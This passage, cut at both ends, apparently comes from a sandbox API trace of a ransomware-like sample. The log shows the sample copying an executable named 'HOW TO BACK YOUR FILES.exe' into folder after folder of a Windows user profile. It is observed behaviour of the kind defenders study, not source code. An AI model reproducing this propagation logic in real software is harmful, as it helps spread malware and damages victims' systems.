FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.929] GetLastError () returned 0x0 [0065.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.929] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.929] CloseHandle (hObject=0x154) returned 1 [0065.929] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.929] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.930] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.930] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.930] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.934] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.934] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.935] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.936] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.936] GetLastError () returned 0x0 [0065.936] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.936] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.936] CloseHandle (hObject=0x154) returned 1 [0065.936] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.936] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.936] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.936] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.936] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.936] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.937] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.937] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.937] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.937] GetLastError () returned 0x0 [0065.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.944] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.944] CloseHandle (hObject=0x154) returned 1 [0065.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.944] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.945] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.945] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.945] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.945] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.945] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.945] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.946] GetLastError () returned 0x0 [0065.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.946] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.946] CloseHandle (hObject=0x154) returned 1 [0065.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.946] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.946] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.946] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.946] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.946] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.946] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.946] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.948] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.948] GetLastError () returned 0x0 [0065.948] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.948] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.948] CloseHandle (hObject=0x154) returned 1 [0065.952] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.952] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.952] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.953] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.953] GetLastError () returned 0x0 [0065.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.953] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.953] CloseHandle (hObject=0x154) returned 1 [0065.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.959] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.963] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.963] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.963] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.963] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.963] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.964] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.964] GetLastError () returned 0x0 [0065.964] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.964] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.964] CloseHandle (hObject=0x154) returned 1 [0065.964] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.964] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.965] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.965] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.965] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.965] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.965] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.967] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.967] GetLastError () returned 0x0 [0065.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.967] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.967] CloseHandle (hObject=0x154) returned 1 [0065.967] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.967] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.967] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.967] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.967] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.968] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.968] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.968] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.968] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.968] GetLastError () returned 0x0 [0065.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.968] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, 